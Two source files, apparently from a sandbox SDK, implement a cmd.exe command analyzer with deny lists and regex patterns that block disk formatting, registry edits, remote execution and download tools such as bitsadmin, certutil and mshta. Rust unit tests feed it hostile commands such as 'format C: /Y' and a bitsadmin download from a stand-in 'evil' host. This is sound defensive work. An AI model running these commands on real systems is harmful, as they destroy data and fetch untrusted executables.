File: sdk/services/sandbox/strategies/shell-analyzers/cmd.ts
/**
 * cmd.exe Shell Analyzer
 *
 * Shell-specific analysis for Windows cmd.exe commands.
 *
 * cmd.exe attack surface differs significantly from bash/PowerShell:
 *   - No fork bombs, but `format C:\ /Y` is destructive
 *   - `%PATH%` vs `$PATH` variable syntax
 *   - `!VAR!` delayed expansion syntax
 *   - Batch file execution with `.bat`/`.cmd`
 *   - No pipe-to-shell equivalent, but `|` pipes text
 *   - `start` command for process spawning
 *   - `assoc`/`ftype` manipulation
 */

import type { ShellAnalysisContext, ShellAnalysisResult, ShellAnalyzer } from "./base.js";
import type { ShellType, ShellPolicy } from "./base.js";

const SHELL_TYPE: ShellType = "cmd";

/** cmd.exe-specific default denied commands */
const DENIED_COMMANDS: string[] = [
  // System manipulation
  "format",
  "diskpart",
  "diskcomp",
  "diskcopy",
  "fdisk",
  // Privilege
  "runas",
  // Registry
  "reg",
  "regedit",
  "regedt32",
  "regini",
  // Network/shares
  "net",
  "net1",
  "netsh",
  // System config
  "bcdedit",
  "bootcfg",
  "bootsect",
  // WMIC (deprecated but still available)
  "wmic",
  // File association
  "assoc",
  "ftype",
  // Process
  "taskkill",
  "tskill",
];

/** cmd.exe-specific dangerous patterns */
export const DANGEROUS_PATTERNS: string[] = [
  // Format disk
  "format\\s+[A-Za-z]:",
  "format\\s+/",
  // Diskpart destructive commands
  "diskpart\\s+/s",
  "clean\\s+all",
  // Registry manipulation via reg import
  "reg\\s+import",
  "reg\\s+add",
  "reg\\s+delete",
  // Dangerous WMIC
  "wmic\\s+process\\s+delete",
  "wmic\\s+path\\s+",
  // Network share manipulation
  "net\\s+share",
  "net\\s+use",
  // Remote execution
  "psexec",
  "winrm",
  // Batch download & exec
  "bitsadmin\\s+/transfer",
  "certutil\\s+-urlcache",
  "certutil\\s+-decode",
  "cscript\\s+",
  // COM/shell object via mshta
  "mshta\\s+",
  // PowerShell invoked from cmd
  "powershell\\s+",
  "pwsh\\s+",
];

export class CmdAnalyzer implements ShellAnalyzer {
  readonly shellType = SHELL_TYPE;

  analyze(ctx: ShellAnalysisContext): ShellAnalysisResult {
    // Resolve policy with defaults first
    const policy = this.resolvePolicy(ctx.policy);

    // Layer 1: Extract primary command
    const primaryCommand = this.extractPrimaryCommand(ctx.command);
    if (!primaryCommand) {
      return {
        allowed: false,
        reason: "Empty command",
        command: ctx.command,
        shellType: SHELL_TYPE,
      };
    }

    if (policy.allowedCommands.length > 0 && !policy.allowedCommands.includes(primaryCommand)) {
      return {
        allowed: false,
        reason: `Command not in whitelist: ${primaryCommand}`,
        command: ctx.command,
        shellType: SHELL_TYPE,
      };
    }
    if (policy.deniedCommands.includes(primaryCommand)) {
      return {
        allowed: false,
        reason: `Command denied by blacklist: ${primaryCommand}`,
        command: ctx.command,
        shellType: SHELL_TYPE,
      };
    }

    // Layer 2: Dangerous pattern detection
    for (const pattern of policy.dangerousPatterns) {
      const regex = new RegExp(pattern, "i");
      if (regex.test(ctx.command)) {
        return {
          allowed: false,
          reason: `Dangerous pattern detected: ${pattern}`,
          command: ctx.command,
          shellType: SHELL_TYPE,
        };
      }
    }

    // Layer 3: Operator checks
    if (!policy.allowPipe && ctx.command.includes("|")) {
      return {
        allowed: false,
        reason: "Pipe operator is not allowed",
        command: ctx.command,
        shellType: SHELL_TYPE,
      };
    }
    if (!policy.allowRedirect && /[<>]/.test(ctx.command)) {
      return {
        allowed: false,
        reason: "Redirect operator is not allowed",
        command: ctx.command,
        shellType: SHELL_TYPE,
      };
    }

    return { allowed: true, command: ctx.command, shellType: SHELL_TYPE };
  }

  private resolvePolicy(policy: ShellPolicy): Required<ShellPolicy> {
    return {
      allowedCommands: policy.allowedCommands ?? [],
      deniedCommands: policy.deniedCommands ?? DENIED_COMMANDS,
      dangerousPatterns: policy.dangerousPatterns ?? DANGEROUS_PATTERNS,
      allowPipe: policy.allowPipe ?? true,
      allowRedirect: policy.allowRedirect ?? true,
    };
  }

  /**
   * Extract primary command from cmd.exe command line.
   *
   * Handles:
   *   `command /option args...`
   *   `@command /option args...`  (suppress echo)
   *   `start /B command`          (start wrapper)
   *   `path\to\command.exe`       (with path)
   */
  private extractPrimaryCommand(command: string): string {
    const trimmed = command.trim();
    if (!trimmed) return "";

    // Remove leading @ (echo suppression)
    const noAt = trimmed.replace(/^@\s*/, "");

    // Skip `start` wrapper
    const noStart = noAt.replace(/^start\s+(\/[A-Za-z]\s+)*/, "");

    // Get first token
    const firstToken = noStart.split(/\s+/)[0];
    if (!firstToken) return "";

    // Extract basename from path (handle both \ and /)
    const basename = firstToken.replace(/^.*[/\\]/, "").replace(/\.(exe|com|bat|cmd)$/i, "");

    return basename.toLowerCase();
  }
}

File: crates/wf-sandbox/src/strategy/shell/cmd.rs
use regex::Regex;
use wf_types::script::sandbox::ShellPolicy;

use super::base::{ShellAnalysisContext, ShellAnalysisResult, ShellAnalyzer, ShellType};

const SHELL_TYPE: ShellType = ShellType::Cmd;

const DENIED_COMMANDS: &[&str] = &[
    "format", "diskpart", "diskcomp", "diskcopy", "fdisk", "runas", "reg", "regedit", "regedt32",
    "regini", "net", "net1", "netsh", "bcdedit", "bootcfg", "bootsect", "wmic", "assoc", "ftype",
    "taskkill", "tskill",
];

pub const DANGEROUS_PATTERNS: &[&str] = &[
    r"format\s+[A-Za-z]:",
    r"format\s+/",
    r"diskpart\s+/s",
    r"clean\s+all",
    r"reg\s+import",
    r"reg\s+add",
    r"reg\s+delete",
    r"wmic\s+process\s+delete",
    r"wmic\s+path\s+",
    r"net\s+share",
    r"net\s+use",
    r"psexec",
    r"winrm",
    r"bitsadmin\s+/transfer",
    r"certutil\s+-urlcache",
    r"certutil\s+-decode",
    r"cscript\s+",
    r"mshta\s+",
    r"powershell\s+",
    r"pwsh\s+",
];

pub struct CmdAnalyzer;

struct ResolvedShellPolicy {
    allowed_commands: Vec<String>,
    denied_commands: Vec<String>,
    dangerous_patterns: Vec<String>,
    allow_pipe: bool,
    allow_redirect: bool,
}

impl CmdAnalyzer {
    fn resolve_policy(&self, policy: &ShellPolicy) -> ResolvedShellPolicy {
        ResolvedShellPolicy {
            allowed_commands: policy.allowed_commands.clone().unwrap_or_default(),
            denied_commands: policy
                .denied_commands
                .clone()
                .unwrap_or_else(|| DENIED_COMMANDS.iter().map(|s| s.to_string()).collect()),
            dangerous_patterns: policy
                .dangerous_patterns
                .clone()
                .unwrap_or_else(|| DANGEROUS_PATTERNS.iter().map(|s| s.to_string()).collect()),
            allow_pipe: policy.allow_pipe.unwrap_or(true),
            allow_redirect: policy.allow_redirect.unwrap_or(true),
        }
    }

    fn extract_primary_command(&self, tokens: &[String]) -> Option<String> {
        let without_start = {
            let first = tokens.first()?;
            if first.eq_ignore_ascii_case("start") {
                tokens
                    .iter()
                    .find(|w| !w.starts_with('/'))
                    .cloned()
                    .unwrap_or_default()
            } else {
                first.trim_start_matches('@').to_string()
            }
        };

        if without_start.is_empty() {
            return None;
        }

        let basename = without_start
            .rsplit(['/', '\\'])
            .next()
            .unwrap_or(&without_start);
        let name = if let Some(dot) = basename.rfind('.') {
            let ext = &basename[dot + 1..];
            if matches!(ext, "exe" | "com" | "bat" | "cmd") {
                basename[..dot].to_string()
            } else {
                basename.to_string()
            }
        } else {
            basename.to_string()
        };

        Some(name.to_lowercase())
    }
}

impl ShellAnalyzer for CmdAnalyzer {
    fn shell_type(&self) -> ShellType {
        SHELL_TYPE
    }

    fn analyze(&self, ctx: &ShellAnalysisContext) -> ShellAnalysisResult {
        let policy = self.resolve_policy(ctx.policy);

        let primary = self.extract_primary_command(ctx.tokens);
        let primary = match primary {
            Some(p) if !p.is_empty() => p,
            _ => {
                return ShellAnalysisResult {
                    allowed: false,
                    reason: Some("Empty command".to_string()),
                    command: ctx.command.to_string(),
                    shell_type: SHELL_TYPE,
                };
            }
        };

        if policy.denied_commands.contains(&primary) {
            return ShellAnalysisResult {
                allowed: false,
                reason: Some(format!("Command denied by blacklist: {primary}")),
                command: ctx.command.to_string(),
                shell_type: SHELL_TYPE,
            };
        }

        if !policy.allowed_commands.is_empty() && !policy.allowed_commands.contains(&primary) {
            return ShellAnalysisResult {
                allowed: false,
                reason: Some(format!("Command not in whitelist: {primary}")),
                command: ctx.command.to_string(),
                shell_type: SHELL_TYPE,
            };
        }

        for pattern in policy.dangerous_patterns {
            if let Ok(re) = Regex::new(&pattern) {
                if re.is_match(ctx.command) {
                    return ShellAnalysisResult {
                        allowed: false,
                        reason: Some(format!("Dangerous pattern detected: {pattern}")),
                        command: ctx.command.to_string(),
                        shell_type: SHELL_TYPE,
                    };
                }
            }
        }

        if !policy.allow_pipe && ctx.command.contains('|') {
            return ShellAnalysisResult {
                allowed: false,
                reason: Some("Pipe operator is not allowed".to_string()),
                command: ctx.command.to_string(),
                shell_type: SHELL_TYPE,
            };
        }

        if !policy.allow_redirect && (ctx.command.contains('<') || ctx.command.contains('>')) {
            return ShellAnalysisResult {
                allowed: false,
                reason: Some("Redirect operator is not allowed".to_string()),
                command: ctx.command.to_string(),
                shell_type: SHELL_TYPE,
            };
        }

        ShellAnalysisResult {
            allowed: true,
            reason: None,
            command: ctx.command.to_string(),
            shell_type: SHELL_TYPE,
        }
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use wf_types::script::sandbox::ShellPolicy;

    fn empty_policy() -> ShellPolicy {
        ShellPolicy {
            allowed_commands: None,
            denied_commands: None,
            dangerous_patterns: None,
            allow_pipe: None,
            allow_redirect: None,
        }
    }

    fn analyzer() -> CmdAnalyzer {
        CmdAnalyzer
    }

    fn analyze(cmd: &str, policy: &ShellPolicy) -> ShellAnalysisResult {
        let tokens = shlex::split(cmd).unwrap_or_default();
        let ctx = ShellAnalysisContext {
            command: cmd,
            policy,
            tokens: &tokens,
        };
        analyzer().analyze(&ctx)
    }

    #[test]
    fn test_cmd_analyzer_shell_type() {
        assert_eq!(analyzer().shell_type(), ShellType::Cmd);
    }

    #[test]
    fn test_allows_safe() {
        let result = analyze("dir", &empty_policy());
        assert!(result.allowed);
    }

    #[test]
    fn test_denies_format() {
        let result = analyze("format C: /Y", &empty_policy());
        assert!(!result.allowed);
        assert!(result.reason.as_ref().unwrap().contains("format"));
    }

    #[test]
    fn test_denies_reg_import() {
        let result = analyze("reg import evil.reg", &empty_policy());
        assert!(!result.allowed);
    }

    #[test]
    fn test_denies_diskpart() {
        let result = analyze("diskpart /s script.txt", &empty_policy());
        assert!(!result.allowed);
    }

    #[test]
    fn test_denies_powershell_invoke() {
        let result = analyze("powershell -Command Invoke-Expression", &empty_policy());
        assert!(!result.allowed);
    }

    #[test]
    fn test_denies_bitsadmin() {
        let result = analyze(
            "bitsadmin /transfer job http://evil/file.exe C:\\out.exe",
            &empty_policy(),
        );
        assert!(!result.allowed);
    }

    #[test]
    fn test_at_prefix_stripped() {
        let result = analyze("@echo hello", &empty_policy());
        assert!(result.allowed);
    }

    #[test]
    fn test_start_wrapper_skipped() {
        let result = analyze("start /B dir", &empty_policy());
        assert!(result.allowed);
    }

    #[test]
    fn test_ext_command_with_path() {
        let result = analyze("C:\\Windows\\System32\\notepad.exe", &empty_policy());
        assert!(result.allowed);
    }

    #[test]
    fn test_whitelist_denies() {
        let policy = ShellPolicy {
            allowed_commands: Some(vec!["dir".to_string()]),
            denied_commands: None,
            dangerous_patterns: None,
            allow_pipe: None,
            allow_redirect: None,
        };
        let result = analyze("echo test", &policy);
        assert!(!result.allowed);
        assert!(result.reason.unwrap().contains("whitelist"));
    }

    #[test]
    fn test_blacklist_wins_over_whitelist() {
        let policy = ShellPolicy {
            allowed_commands: Some(vec!["format".to_string(), "dir".to_string()]),
            denied_commands: None,
            dangerous_patterns: None,
            allow_pipe: None,
            allow_redirect: None,
        };
        let result = analyze("format C: /Y", &policy);
        assert!(!result.allowed);
        let reason = result.reason.unwrap();
        assert!(
            reason.contains("blacklist"),
            "blacklist must be reported before whitelist: {reason}"
        );
    }

    #[test]
    fn test_empty_command() {
        let result = analyze("", &empty_policy());
        assert!(!result.allowed);
    }
}
